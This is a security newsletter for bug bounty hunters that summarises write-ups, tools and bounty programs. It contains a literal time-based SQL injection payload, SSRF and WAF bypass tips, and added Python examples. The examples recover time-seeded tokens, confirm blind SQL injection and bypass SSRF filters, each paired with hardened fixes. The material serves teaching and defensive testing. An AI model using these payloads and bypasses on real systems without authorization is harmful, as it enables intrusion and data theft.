- Disclosed. August 23, 2025. RCE on 1M Repos, €230K Swiss Post Bounty, Zoom Multiplier, and More
The bug bounty world, curated.
Welcome to Disclosed.

Each week, 3 readers will win a 1-month PentesterLab Pro license, completely free. Refer a friend to the newsletter to enter.
Shout out to this week’s winners (I will email you):
sop608.so
boy.binary0101
arthur.h
PentesterLab is one of the best hands-on platforms for learning web security, with real-world vulnerabilities, private labs, and practical exercises trusted by professionals and bug bounty hunters worldwide.
Huge thanks to PentesterLab for sponsoring this giveaway and supporting the Disclosed. community. ❤️
By the way, referrals are so low right now that almost everyone who has referred someone has received a PentesterLab license. Your chances of being selected are VERY HIGH

Hey everyone! I’m finally back home from DEF CON and catching up on everything I put off during Bug Bounty Village 😅 Huge thanks to everyone who came out and showed support. The energy this year was amazing with packed talks, hallway chats, and a strong community vibe. We put together a brief recap that you can read here.
One of the best things about post-DEF CON is the flood of research and write-ups it inspires. This month I’ve noticed a huge spike in write-ups, which pulled me down more than a few rabbit holes while putting this drop together. The “Write-Up” section is a bit longer this time, and I highly recommend reading those. The quality is excellent, and I’m definitely feeling inspired to get out there hunting.
Anyway, let’s dive in.
In This Issue

Exploiting CodeRabbit: From a Simple PR to RCE and Write Access on 1M Repositories [📓 Blog]
by Kudelski Security Research
This article documents the exploitation of vulnerabilities in the CodeRabbit AI code review tool, leading to remote code execution on CodeRabbit's production servers and write access to one million repositories. The chain turned on Rubocop, which CodeRabbit ran against submitted pull requests: a crafted Rubocop configuration file in the PR made it load attacker-supplied Ruby code, giving arbitrary code execution. The article also covers CodeRabbit's remediation, which was prompt and effective.
Read more →
Hiring CTF Challenge Creators for Remote Position [🔗 Tweet]
by Luke Stephens (hakluke)
This tweet announces a job opening for creating Capture The Flag (CTF) challenges, highlighting the requirement for experience and English proficiency.
See more →
Calling all CTF creators. 🗣️
Want a job where you create CTF challenges all day, every day?
That is exactly what I'm hiring. Fully remote, flexible hours.
Requirements:
- Must have experience creating CTF challs (not just playing them)
- Excellent English proficiency
- Great
— Luke Stephens (hakluke) (@hakluke)
7:39 PM • Aug 20, 2025
Lessons from 9 Months of Bug Bounty Research [🔗 Tweet]
by James Kettle
The tweet promotes a 40-minute talk summarizing nine months of bug bounty research, underscoring the significance of persistence and problem-solving in the field.
See more →
When I condense nine months of research discoveries into a 40-min talk, it can make it seem easy. For a taster of the true experience, watch my battle to solve the 0-CL @WebSecAcademy lab! Research is persistence.
— James Kettle (@albinowax)
2:43 PM • Aug 21, 2025
NahamSec’s Def Con 33 Recap Video [🔗 Video]
by NahamSec
In his DEF CON 33 vlog, NahamSec takes viewers behind the scenes of the four-day event—highlighting hacker communities, village setups, parties, talks, and exclusive moments with friends and fellow researchers. The video captures the energy of the Bug Bounty Village, panels, and keynote talks.
Watch the full video →
Have something you want to Spotlight? Tell me.

Swiss Post Intrusion Test Offering Rewards up to €230,000 [🔗 Link]
by YesWeHack
Swiss Post is running its annual Public Intrusion Test with rewards reaching as high as €230,000 per valid report. Even medium-tier findings pay €40,000, and write-in fields are in scope for the first time. The event is time-limited and concludes on 24 August.
Read the full details →
New Zoom Bug Bounty Campaign [🔗 Tweet]
by Roy Davis
A new bug bounty campaign for Zoom Hub launches next Monday with a 1.25x bounty multiplier, encouraging researchers to participate.
See more →
hey @Zoom #BugBounty researchers! New Campaign starting next Monday focused on Zoom Hub (support.zoom.com/hc/en/article?…). 1.25x Bounties! Get Hacking!
— Roy Davis (@Hack_All_Things)
4:28 PM • Aug 22, 2025
HackerOne AI Red Team CTF Challenge This September [🔗 Tweet]
by HackerOne
This tweet announces a full-length AI Red Team CTF competition in collaboration with Hack The Box, inviting security researchers to compete and earn rewards.
See more →
Security researchers, we’re launching a full-length AI Red Team CTF with @hackthebox_eu this September:
A multi-flag, adversarial LLM challenge series.
Play from anywhere. Climb the leaderboard.
Unlock exclusive swag.
Registration is open now: 🔗 bit.ly/4oGQ6mA
— HackerOne (@Hacker0x01)
11:08 AM • Aug 22, 2025
HackerOne Belgium Ambassador Hosted Event [🔗 Tweet]
by drop
The tweet announces the inaugural HackerOne Belgium event, designed for the Belgian bug bounty community to promote collaboration and knowledge sharing.
Read the full tweet →
🚀 Go BIG or go home, they said! So we decided to go BIG for the very first HackerOne Belgium event!
We are excited to announce the first-ever HackerOne Belgium event, created especially for the Belgian bug bounty community.
This event will bring you a fully virtual live
— drop (@dropn0w)
4:00 PM • Aug 21, 2025
Did I miss an important update? Tell me.

Autoswagger — Open Source API Authorization Scanner [📁 Tool]
by intruder-io
Autoswagger is a free command-line tool that automatically scans Swagger/OpenAPI endpoints for broken authorization, secrets, and PII leaks.
Read more →
Introducing JsonViewer: A New Tool for Better JSON Handling [🔗 Tweet]
by @_Freakyclown_
Announcing JsonViewer, a tool designed to streamline JSON data navigation with features like table views and bookmarks, beneficial for both developers and researchers.
Read the full thread →
New tool drop: JsonViewer 🚀
Stop scrolling through JSON like a raccoon in a dumpster.
👉 Clean, searchable tables
👉 Bookmarks, filters, exports
👉 Runs in your terminal (SSH/VPS/local)
GitHub:
YouTube demo: youtube.com/watch?v=j8yrV7…
make JSON suck less.
— freakyclown (@_Freakyclown_)
6:43 PM • Aug 22, 2025
From Nmap to Real-Time Internet Maps with IVRE: A Step-by-Step Playbook [📓 Blog]
by Very Lazy Tech
This blog post presents a detailed guide on utilizing IVRE to create real-time internet maps from Nmap scan data, providing key commands and initialization steps to enhance network analysis for penetration testers.
Read more →

secrets-ninja: GUI Tool for API Key Validation [📁 Tool]
by NikhilPanwar
Secrets Ninja is a GUI tool for validating and investigating API keys discovered during pentesting and bug bounty hunting, designed to be extensible and user-friendly.
View the tool →

New Tool for CSS Injection Token Leaks [🔗 Tweet]
by André Baptista
This tweet highlights a new tool that utilizes CSS injection techniques to leak sensitive tokens effortlessly in browsers.
Read the full thread →
Typical CSS injection often relies on repeated context loading (usually via iframes) to exfiltrate sensitive tokens.
I found this tool by @ixSly that's both fast and works in Chrome and Safari. It can leak tokens with just a single CSS import by leveraging -webkit-cross-fade 🤯
— André Baptista (@0xacb)
9:03 AM • Aug 20, 2025
New Repeater Feature for Exploring Request Smuggling [🔗 Tweet]
by James Kettle
Announcing a 'Retry until success' feature for Burp Repeater that resends a request until the response status code changes, which makes the intermittent, timing-dependent behaviour of request smuggling much easier to probe.
Read the full thread →
I just published a Repeater feature to make it easier to explore request smuggling. It repeats your request until the status code changes. It's called "Retry until success" and you can install it via the Extensibility helper bapp.
— James Kettle (@albinowax)
3:01 PM • Aug 20, 2025
Have a favorite tool? Tell me.

From PDF to Five-Figure Payday: When Legacy Docs Attack [📓 Blog]
by Armand Jasharaj (@_Zer0Sec_)
In under 30 minutes, the researcher turned a series of minor misconfigurations, discovered via forced browsing and IIS tilde enumeration, into a critical-severity bug, culminating in a five-figure bounty after retrieving PII from an internal admin portal that was exposed through a blurry legacy PDF screenshot.
From RPM Repository to Account Compromise [🔗 Article]
by Phil (@yppip)
In this write-up, Phil details how he discovered an unauthenticated JSON endpoint exposing RPM packages, which he automatedly downloaded and analyzed—uncovering hardcoded employee credentials that allowed a full account takeover.
Read the full write-up →
Zero-Click Account Takeover Leading to Admin Access [🔗 Tweet]
by @tbbhunter
A researcher discovered an SSO misconfiguration, a self-XSS, and a cache poisoning issue, chaining them to achieve a 0-click account takeover in the wild. The finding earned a five-digit bounty and highlighted the complexity of hidden cache poisoning surfaces and WAF evasion.
See more →
Using Microsoft SSO to Achieve Full Account Takeover [📓 Blog]
by SECarius
This post details a method for exploiting a vulnerability in a Microsoft Single Sign-On (SSO) service that leads to full account takeover. It discusses identifying the vulnerable asset with a custom tool and dissects the authentication logic to reveal a critical flaw involving hardcoded credentials. Techniques like JavaScript code analysis and OSINT are also highlighted.
Read more →
Using AFL++ on bug bounty programs: an example with Gnome libsoup [📓 Blog]
by Almond Offensive Security Blog
This article outlines the application of AFL++ for fuzzing the Gnome libsoup library within a bug bounty program. It covers setup using Docker, custom harness creation, and the discovery of an out-of-bounds write vulnerability. Key insights include harness optimization and the importance of reproducibility for reporting vulnerabilities.
Read more →
Bypassing Authentication with a Single Request [📓 Blog]
by aj-09
This narrative describes discovering an undocumented API endpoint that allows authentication bypass with a single HTTP request, emphasizing exploration beyond API documentation. It showcases the technical aspects alongside the necessary mindset for effective bug hunting.
Read more →
Insightly | Report #2718253 - Email verification bypass [📓 Report]
by HackerOne
This report details an email verification bypass vulnerability in the Insightly signup process. By altering the 'EmailAddress' parameter in the signup request, attackers can create accounts with existing email addresses, posing significant risks. The submission includes steps to reproduce and validates the exploit.
Read more →
How I found an RCE seconds after its publication [📓 Blog]
by SECarius
This article describes the swift discovery of an RCE vulnerability within an n8n instance right after its deployment, utilizing alerts from the Profundis service. It emphasizes the importance of timely alerts and discusses potential risks like privilege escalation when gaining shell access.
Read more →
Did I miss an important update? Tell me.

Bug Bounty Guide: XXE Injection Explained with Real Reports [🎥 Video]
by Medusa
This video provides a breakdown of XXE Injection, detailing how it can be exploited in bug bounty hunting.
Watch video →
Exploring Permission Hierarchies for IDOR Discoveries [🎥 Video]
by Bugcrowd
In this Bugcrowd video, InsiderPhD explains why an application's permission hierarchy hides more than plain IDORs: mapping which role can reach which object at each level of the hierarchy is how you surface the authorization bugs that turn into big findings.
Watch the video →
Permission hierarchies hide more than just IDORs.
Keep an eye out for complexion hierarchies and surface IDORs, understanding those levels is how you land the big finds 🤑
🎥: @InsiderPhD youtube.com/watch?v=-MsjH-…
— bugcrowd (@Bugcrowd)
6:17 PM • Aug 22, 2025
Exploring Government Cybersecurity with Jack Cable [🎥 Video]
by Critical Thinking - Bug Bounty Podcast
In the latest podcast episode, Jack Cable discusses his Cluely hack experience and the legal challenges faced by hackers, shedding light on government cybersecurity initiatives.
See more →
Exploit Remote Code Execution via Predictable Tokens [🎥 Video]
by YesWeHack ⠵
A new video walkthrough of the CCTV Manager challenge shows how predictable Python tokens seeded with system time combined with unsafe YAML loading can be exploited to achieve remote code execution.
See more →
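The predictable-token half of that challenge is worth seeing in code. The block below is an added example, not the CCTV Manager challenge or YesWeHack's code: a constructed token issuer that seeds Python's random module with whole-second system time, the attacker-side search that recovers the seed from one observed token and an approximate issue time, and the secrets-based replacement. The YAML half (yaml.load on attacker-controlled input; the fix is yaml.safe_load) is left out so the example stays on the standard library. The TOKEN_BITS width and the one-minute search window are assumptions.

```python
import random
import secrets
from typing import Optional

TOKEN_BITS = 64  # assumed token width; the search cost does not depend on it


def issue_token_weak(now: float) -> str:
    """Constructed model of the flaw: the PRNG is seeded with whole-second system
    time, so the token is a pure function of *when* it was issued. Every token
    issued within the same second is identical."""
    rng = random.Random(int(now))
    return f"{rng.getrandbits(TOKEN_BITS):016x}"


def issue_token_strong() -> str:
    """Hardened replacement: OS-backed CSPRNG, no seed to recover."""
    return secrets.token_hex(TOKEN_BITS // 8)


def recover_seed(observed_token: str, approx_issue_time: float,
                 window: int = 60) -> Optional[int]:
    """Attacker side. The issue time is roughly known (Date header, log line,
    'reset link sent' timestamp), so replay the generator for every second in
    +/- window and return the seed that reproduces the observed token.
    Once one token confirms the scheme, any token issued in a known second
    (e.g. another user's session or reset token) is computable the same way."""
    base = int(approx_issue_time)
    for delta in range(-window, window + 1):
        seed = base + delta
        candidate = f"{random.Random(seed).getrandbits(TOKEN_BITS):016x}"
        if candidate == observed_token:
            return seed
    return None


if __name__ == "__main__":
    issued_at = 1_700_000_000.5          # constructed issue time
    token = issue_token_weak(issued_at)
    print("weak token  :", token)
    print("seed found  :", recover_seed(token, issued_at + 17))   # 1700000000
    print("strong token:", issue_token_strong(),
          "-> seed search:", recover_seed(issue_token_strong(), issued_at))  # None
```

A window of 60 seconds costs 121 PRNG instantiations, so even a sloppy estimate of the issue time is enough; seeding with time.time() as a float only raises the cost, it does not remove the problem.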
How to find XSS via SSRF [🎥 Video]
by Bug Bounty With Marco
A researcher exploited an outdated Jira instance to chain an SSRF into reflected XSS, enabling them to inject payloads via consumer URLs and replicate the bug across multiple high-profile targets including Motorola, government sites, and universities.
Watch video →
Did I miss something? Tell me.

Vulnerability Vectors: SQL Injection for Bug Bounty Hunters [🔗 Blog]
by YesWeHack
This guide covers a range of SQL injection techniques for bug bounty hunters, from simple to advanced methods (Boolean-based, UNION, blind, time-based, out-of-band, and second-order SQLi), and provides tips for crafting payloads and bypassing WAFs to detect and exploit vulnerabilities.
Read more →

The Guide to Blind XSS: Advanced Techniques for Bug Bounty Hunters Worth $250,000 [🔗 Blog]
by Bugcrowd
This guide teaches hunters to adopt patience and strategy—crafting blind XSS payloads in workflows like support tickets, order processing, or admin dashboards, where multi-system propagation can trigger execution later and potentially multiply bounty value.
Read more →

A guide to path traversal and arbitrary file read attacks [📓 Blog]
by YesWeHack
This guide explains path traversal and arbitrary file read attacks, detailing detection and exploitation techniques while discussing resolution strategies in various programming languages.
Read more →

Portswigger Server-side template injection — Expert [📓 Blog]
by Mike (sl0th0x87)
This post investigates a Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine, detailing how an attacker can exploit misconfigured sandboxes for arbitrary file reads. Practical exploitation examples are provided.
Read more →

Slides on Hacking Stripe Integrations Released [🔗 Tweet]
by Ananda Dhakal
The post shares slides on exploiting Stripe integrations to bypass e-commerce payments, with a more detailed blog coming soon for further insights.
Read the full thread →
Did I miss something? Tell me.

Finding Critical Bugs in Exposed .git Directories [🔗 Tweet]
by Abhishek Meena - {🔥}
The tweet warns about sensitive information at risk due to improperly configured .git directories, underscoring a common yet critical finding in bug bounty hunting.
Read the full thread →
Thread: 1/4
Bug Bounty Tip 🧵: Your next critical finding might be hiding in a publicly exposed .git directory.
It's a common misconfiguration that leaks the entire code history, including secrets, old endpoints, and unpatched vulns.
#bugbountytips #infosec
— Abhishek Meena - {🔥} (@aacle_)
5:37 PM • Aug 22, 2025
SQL Injection Payload Delivers $2,000 Bounty on Hacker0x01 [🔗 Tweet]
by Lu3ky13 ⚡️⚡️
This tweet highlights an SQL injection payload that earned a $2,000 bounty on Hacker0x01, showcasing the potential of exploiting delays via PG_SLEEP.
Read the full thread →
SQL injection
Payload
"startDate": "2025-04-03d' AND 1=(SELECT 1 FROM PG_SLEEP(10)) OR '1'='0
Yay, I was awarded a $2,000 bounty on @Hacker0x01! #TogetherWeHitHarder
— Lu3ky13 ⚡️⚡️ (@lu3ky13)
6:39 AM • Aug 19, 2025
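Confirming a time-based blind injection like the one above is mostly about not fooling yourself with latency noise. The block below is an added example, not the reporter's tooling or the target: a constructed SQLite-backed stand-in for the vulnerable endpoint (SQLite has no pg_sleep, so one is registered as a Python function and scaled down so the demo runs in under a second), the same endpoint with a parameterized query, and a differential timing check that compares the real sleep payload against a pg_sleep(0) control with identical syntax, so a slow error path cannot pass for a sleep. The table, column and SLEEP_SCALE are assumptions.

```python
import sqlite3
import statistics
import time
from typing import Callable, Dict, List

# Constructed scale factor: pg_sleep(10) in the fake backend sleeps
# 10 * SLEEP_SCALE real seconds instead of 10.
SLEEP_SCALE = 0.02

# Payload shape from the tweet: close the quote, OR in a scalar subquery that
# only returns once pg_sleep() has returned (NULL, hence IS NULL), re-balance quotes.
INJECTION = "' OR 1=(SELECT 1 WHERE pg_sleep({delay}) IS NULL) OR '1'='0"


def build_app(parameterized: bool) -> Callable[[str], List[tuple]]:
    """Constructed stand-in for the endpoint behind the 'startDate' parameter."""
    db = sqlite3.connect(":memory:")
    db.create_function("pg_sleep", 1, lambda s: time.sleep(float(s) * SLEEP_SCALE))
    db.execute("CREATE TABLE bookings (id INTEGER PRIMARY KEY, start_date TEXT)")
    db.execute("INSERT INTO bookings VALUES (1, '2025-04-03')")

    def search(start_date: str) -> List[tuple]:
        try:
            if parameterized:
                # Hardened: the value is bound, never spliced into SQL text.
                return db.execute(
                    "SELECT id FROM bookings WHERE start_date = ?", (start_date,)
                ).fetchall()
            # The bug: user input concatenated into the statement.
            sql = "SELECT id FROM bookings WHERE start_date = '" + start_date + "'"
            return db.execute(sql).fetchall()
        except sqlite3.Error:
            return []  # a real app would 500; the timing side channel survives anyway

    return search


def median_latency(probe: Callable[[str], object], value: str, trials: int) -> float:
    samples = []
    for _ in range(trials):
        t0 = time.perf_counter()
        probe(value)
        samples.append(time.perf_counter() - t0)
    return statistics.median(samples)


def confirm_time_based(probe: Callable[[str], object], base_value: str,
                       delay: int = 10, expected_seconds: float = 10.0,
                       trials: int = 3) -> Dict[str, object]:
    """Differential check: median latency of the plain value, of a pg_sleep(0)
    control, and of the real sleep payload. base_value must NOT match a row:
    engines short-circuit `true OR ...`, so a matching first comparison can skip
    the sleep entirely (one reason the tweet's value carries a stray 'd')."""
    control = base_value + INJECTION.format(delay=0)
    injected = base_value + INJECTION.format(delay=delay)
    t_base = median_latency(probe, base_value, trials)
    t_ctrl = median_latency(probe, control, trials)
    t_inj = median_latency(probe, injected, trials)
    return {
        "baseline": t_base, "control": t_ctrl, "injected": t_inj,
        "vulnerable": (t_inj - t_ctrl) >= 0.8 * expected_seconds,
    }


if __name__ == "__main__":
    for label, app in (("concatenated", build_app(False)), ("parameterized", build_app(True))):
        print(label, confirm_time_based(app, "2025-04-03d",
                                        expected_seconds=10 * SLEEP_SCALE))
```

Against a live target, replace the probe with an HTTP request, keep the trials, and vary the delay (5, 10, 20) to show the latency tracks the argument; a single slow response proves nothing on a congested network.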
Bypassing 302 Redirects to Access API Documentation [🔗 Tweet]
by Arshiya
This tweet shows that a 302 on the site root says nothing about the rest of the tree: requesting a deeper path directly (/app/api/doc/) returned the API documentation with a 200. Worth a forced-browse pass on any host that only redirects you away from /.
Read the full thread →
redacted[.]com/ --> [302]❌
redacted[.]com/app/api/doc/ --> [200 OK] ✅
Bypassed the 302 and hit API doc gold!
#bugbountytips #BugBounty
— Arshiya (@arshiyaiha)
5:56 PM • Aug 19, 2025
Bypassing SSRF Restrictions in Webhook Applications [🔗 Tweet]
by 0xRAYAN 🇸🇦
The tweet outlines techniques for bypassing SSRF restrictions in webhooks, including various redirection methods and userinfo injection.
Read the full thread →
💡 Bug Bounty Tip - SSRF Bypass in Webhooks
Some apps block 127.0.0.1 or metadata URLs, but you can bypass it:
1️⃣ 303 Redirect → Host a page that redirects to an internal URL
2️⃣ DNS Rebinding → Use 127.0.0.1.nip.io (resolves to localhost)
3️⃣ Userinfo Injection →
— 0xRAYAN 🇸🇦 (@0xRAYAN7)
4:47 PM • Aug 20, 2025
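All three bypasses in that tweet target the same mistake: validating a URL string instead of the address the client will actually connect to, and validating it once instead of at every hop. The block below is an added example, not the tweet author's tooling or any particular app: a naive denylist filter of the kind the tweet describes, beside a hardened validator that rejects userinfo, resolves the host, normalizes literal and IPv4-mapped addresses, and is re-applied on every redirect. The resolver, the HTTP responses and the host names are constructed so it runs offline; a real client would use socket.getaddrinfo() and make the request with redirects disabled. One caveat on the tweet's wording: 127.0.0.1.nip.io is wildcard DNS that simply resolves to loopback, not rebinding in the strict sense; true rebinding (a short-TTL answer that changes between the check and the connect) additionally requires pinning the resolved IP for the connection.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

# Constructed resolver and HTTP table so the example runs offline.
FAKE_DNS = {
    "hooks.partner.example": ["203.0.113.10"],
    "127.0.0.1.nip.io": ["127.0.0.1"],             # public-looking name -> loopback
    "redirector.attacker.example": ["198.51.100.7"],
}
FAKE_HTTP = {  # url -> (status, Location, body)
    "https://hooks.partner.example/webhook": (200, None, "ok"),
    "http://redirector.attacker.example/go": (303, "http://127.0.0.1/admin", ""),
    "http://127.0.0.1/admin": (200, None, "internal admin panel"),
}
REDIRECTS = {301, 302, 303, 307, 308}

BLOCKED_HOSTS = {"127.0.0.1", "localhost", "169.254.169.254", "metadata.google.internal"}
DENIED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10",
)]


def is_safe_naive(url: str) -> bool:
    """The filter the tweet is about: pull 'the host' out of netloc with a split
    and compare it with a denylist. Every trick in the tweet walks past it."""
    host = urlsplit(url).netloc.split(":")[0].lower()
    return host not in BLOCKED_HOSTS


def _addresses(host: str, resolver=FAKE_DNS):
    """Every IP the host can stand for: a literal (IPv6 included), the integer or
    hex spellings inet_aton accepts (2130706433 == 127.0.0.1), or a DNS answer."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        pass
    try:
        return [ipaddress.ip_address(socket.inet_ntoa(socket.inet_aton(host)))]
    except OSError:
        pass
    return [ipaddress.ip_address(a) for a in resolver.get(host, [])]


def is_safe_hardened(url: str, resolver=FAKE_DNS) -> bool:
    p = urlsplit(url)
    if p.scheme not in ("http", "https") or not p.hostname:
        return False
    if p.username is not None or p.password is not None:
        return False                  # userinfo injection: http://allowed.example@10.0.0.1/
    addrs = _addresses(p.hostname, resolver)
    if not addrs:
        return False                  # unresolvable: fail closed
    for ip in addrs:
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped       # [::ffff:127.0.0.1] is still loopback
        if any(ip in net for net in DENIED_NETWORKS):
            return False
    return True


def deliver_naive(url: str, max_hops: int = 5):
    """Validate once, then follow redirects blindly (an HTTP library's default)."""
    if not is_safe_naive(url):
        return None
    for _ in range(max_hops):
        status, location, body = FAKE_HTTP.get(url, (404, None, ""))
        if status in REDIRECTS and location:
            url = urljoin(url, location)
            continue
        return body
    return None


def deliver_hardened(url: str, max_hops: int = 5):
    """Re-validate every hop: the 303 trick only works when hop two is never checked."""
    for _ in range(max_hops):
        if not is_safe_hardened(url):
            return None
        status, location, body = FAKE_HTTP.get(url, (404, None, ""))
        if status in REDIRECTS and location:
            url = urljoin(url, location)
            continue
        return body
    return None
```

The DENIED_NETWORKS list is deliberately explicit rather than relying on ipaddress's is_global, which also rejects the RFC 5737 documentation ranges used for the constructed partner host; extend it with whatever your environment treats as internal (cloud metadata endpoints, service meshes, IPv6 ULA you actually use).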
New Technique for Bypassing Akamai and Cloudflare WAFs [🔗 Tweet]
by VIEH Group
This tweet claims a newly discovered bypass for Web Application Firewalls (WAFs) such as Akamai and Cloudflare. The tweet itself gives no technical detail beyond the claim, so read the linked thread and reproduce the technique before relying on it.
Read the full thread →
Bug Bounty tips 👀
New WAF Bypass Discovered - Akamai & Cloudflare 🔥 A fresh technique has been spotted that successfully bypasses WAFs like Akamai and Cloudflare.
#Exploit #WAFBypass #XSS #Cloudflare #Akamai #WebSecurity #BugBounty #bugbountytips
— VIEH Group (@viehgroup)
8:00 AM • Aug 21, 2025
Did I miss something? Tell me.
Did you like this week's drop? Please share feedback.
Because Disclosure Matters: This newsletter was produced with the assistance of AI. While I strive for accuracy and quality, not all content has been independently vetted or fact-checked. Please allow for a reasonable margin of error. The views expressed are my own and do not reflect those of my employer.